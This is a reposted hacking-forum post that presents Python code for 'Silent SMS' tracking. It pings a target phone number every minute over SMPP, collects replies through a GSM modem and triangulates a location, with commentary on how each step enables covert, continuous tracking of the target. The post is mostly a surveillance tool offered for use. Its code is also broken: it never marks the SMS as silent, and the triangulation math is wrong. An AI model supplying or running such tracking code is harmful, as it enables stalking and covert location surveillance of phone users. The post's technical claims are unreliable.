Using sms for location
2024-6-30 16:5:32 Author: 0x00sec.org(查看原文) 阅读量:17 收藏

Of all the rabbit holes I’ve explored in my time, this is the one from which I have yet to re-emerge. While having had some success on the SS7 front I decided to explore some alternatives that may be an easier path to my end goal of a covert route to subscriber location.

Overview

_* WARNING *_: This guide provides a Python-based implementation for Silent SMS tracking. The code provides a basic framework for Silent SMS tracking. It demonstrates the core concepts of sending covert messages, collecting response data, and using that data to estimate a device’s location. However, it’s important to note that this is a simplified implementation and would require significant enhancements for real-world use.

1. Setting Up the Environment

pip install pygsm smpplib geopy

2. Sending Silent SMS

import smpplib
import smpplib.gsm

def send_silent_sms(target_number, message=""):
    client = smpplib.client.Client("localhost", 2775)
    client.set_message_sent_handler(
        lambda pdu: sys.stdout.write('sent {} {}\n'.format(pdu.sequence, pdu.message_id)))
    client.connect()
    client.bind_transmitter(system_id="user", password="password")

    parts, encoding_flag, msg_type_flag = smpplib.gsm.make_parts(message)

    for part in parts:
        pdu = client.send_message(
            source_addr_ton=smpplib.consts.SMPP_TON_ALNUM,
            source_addr_npi=smpplib.consts.SMPP_NPI_UNK,
            source_addr="SilentSMS",
            dest_addr_ton=smpplib.consts.SMPP_TON_INTL,
            dest_addr_npi=smpplib.consts.SMPP_NPI_ISDN,
            destination_addr=target_number,
            short_message=part,
            data_coding=encoding_flag,
            esm_class=msg_type_flag,
            registered_delivery=True,
        )
    
    client.unbind()
    client.disconnect()

# Usage
send_silent_sms("+1234567890")

3. Receiving and Processing SMS Data

import pygsm

def process_received_sms(modem):
    while True:
        sms = modem.next_message()
        if sms is None:
            break
        print(f"Received: {sms}")
        # Process the SMS data here
        process_sms_data(sms)

def process_sms_data(sms):
    # Extract relevant information from the SMS
    # This is where you'd implement your specific processing logic
    pass

# Set up the GSM modem
modem = pygsm.GsmModem(port="/dev/ttyUSB0", baudrate=115200)
modem.connect()

# Start processing received messages
process_received_sms(modem)

4. Basic Triangulation

from geopy import distance

def triangulate(tower1, tower2, tower3, dist1, dist2, dist3):
    """
    Basic triangulation using three cell towers.
    tower1, tower2, tower3 are tuples of (latitude, longitude)
    dist1, dist2, dist3 are distances from each tower to the target
    """
    def get_third_point(p1, d1, p2, d2):
        # Calculate the two possible points
        bearing = distance.distance(kilometers=d1).destination(p1, 0)
        c1 = distance.distance(kilometers=d2).destination(p2, bearing)
        c2 = distance.distance(kilometers=d2).destination(p2, bearing + 180)
        return c1, c2

    # Get two possible points from the first two towers
    c1, c2 = get_third_point(tower1, dist1, tower2, dist2)
    
    # Check which point is closer to the third tower
    if abs(distance.distance(c1, tower3).kilometers - dist3) < abs(distance.distance(c2, tower3).kilometers - dist3):
        return c1
    else:
        return c2

# Example usage
tower1 = (40.7128, -74.0060)  # New York
tower2 = (34.0522, -118.2437)  # Los Angeles
tower3 = (41.8781, -87.6298)  # Chicago
dist1 = 100  # km
dist2 = 200  # km
dist3 = 150  # km

estimated_location = triangulate(tower1, tower2, tower3, dist1, dist2, dist3)
print(f"Estimated location: {estimated_location}")

5. Putting It All Together

import threading
import time

def main():
    # Set up the GSM modem
    modem = pygsm.GsmModem(port="/dev/ttyUSB0", baudrate=115200)
    modem.connect()

    # Start a thread for processing received messages
    receive_thread = threading.Thread(target=process_received_sms, args=(modem,))
    receive_thread.start()

    # Main loop for sending Silent SMS and performing triangulation
    while True:
        target_number = "+1234567890"  # Replace with actual target number
        send_silent_sms(target_number)
        time.sleep(60)  # Wait for 60 seconds before next ping

        # Perform triangulation (assuming you have the necessary data)
        # estimated_location = triangulate(tower1, tower2, tower3, dist1, dist2, dist3)
        # print(f"Estimated location: {estimated_location}")

    # Clean up
    receive_thread.join()
    modem.disconnect()

if __name__ == "__main__":
    main()

Note: This implementation is a simplified version for educational purposes. A real-world implementation would require more robust error handling, secure communication protocols, and integration with actual cellular network infrastructure.

WARNING: This is detailed analysis of Silent SMS tracking code. It’s super unethical to use this to check up on an ex.

1. Sending Silent SMS

The send_silent_sms function uses the SMPP (Short Message Peer-to-Peer) protocol to send silent SMS messages. Here’s how it works:

  • It connects to an SMPP server (in this case, localhost).
  • The message is split into parts if necessary.
  • Each part is sent as a PDU (Protocol Data Unit) with specific parameters.
  • The registered_delivery=True parameter requests a delivery receipt, which is crucial for tracking.

This function is used for location tracking because:

  • Silent SMS doesn’t appear on the recipient’s device, making it covert.
  • The delivery receipt provides timing information used in triangulation.
  • Regular pings allow for continuous tracking of the target device.

2. Receiving and Processing SMS Data

The process_received_sms function continuously checks for incoming messages:

  • It uses a GSM modem to receive SMS messages.
  • Each received message is passed to process_sms_data for further analysis.

This is crucial for location tracking because:

  • It captures the responses from the target device or network.
  • These responses contain timing and signal strength information.
  • This data is essential for calculating the device’s position.

3. Basic Triangulation

The triangulate function implements a basic triangulation algorithm:

  • It takes the positions of three cell towers and the distances from each tower to the target.
  • It uses the geopy library to perform geographical calculations.
  • The function calculates two possible points and chooses the one closest to the third tower.

This is fundamental to location tracking because:

  • It converts timing and signal strength data into a geographical position.
  • Using multiple towers improves accuracy and reliability.
  • It provides a concrete location estimate for the target device.

4. Main Loop

The main function ties everything together:

  • It sets up a GSM modem for receiving messages.
  • It starts a separate thread for processing received messages.
  • It continuously sends silent SMS messages to the target number.
  • There’s a placeholder for performing triangulation with the collected data.

This main loop is critical for continuous tracking:

  • Regular pinging allows for real-time location updates.
  • The multithreaded approach allows simultaneous sending and receiving.
  • It provides a framework for integrating more advanced tracking algorithms.

文章来源: https://0x00sec.org/t/using-sms-for-location/41153
如有侵权请联系:admin#unsafe.sh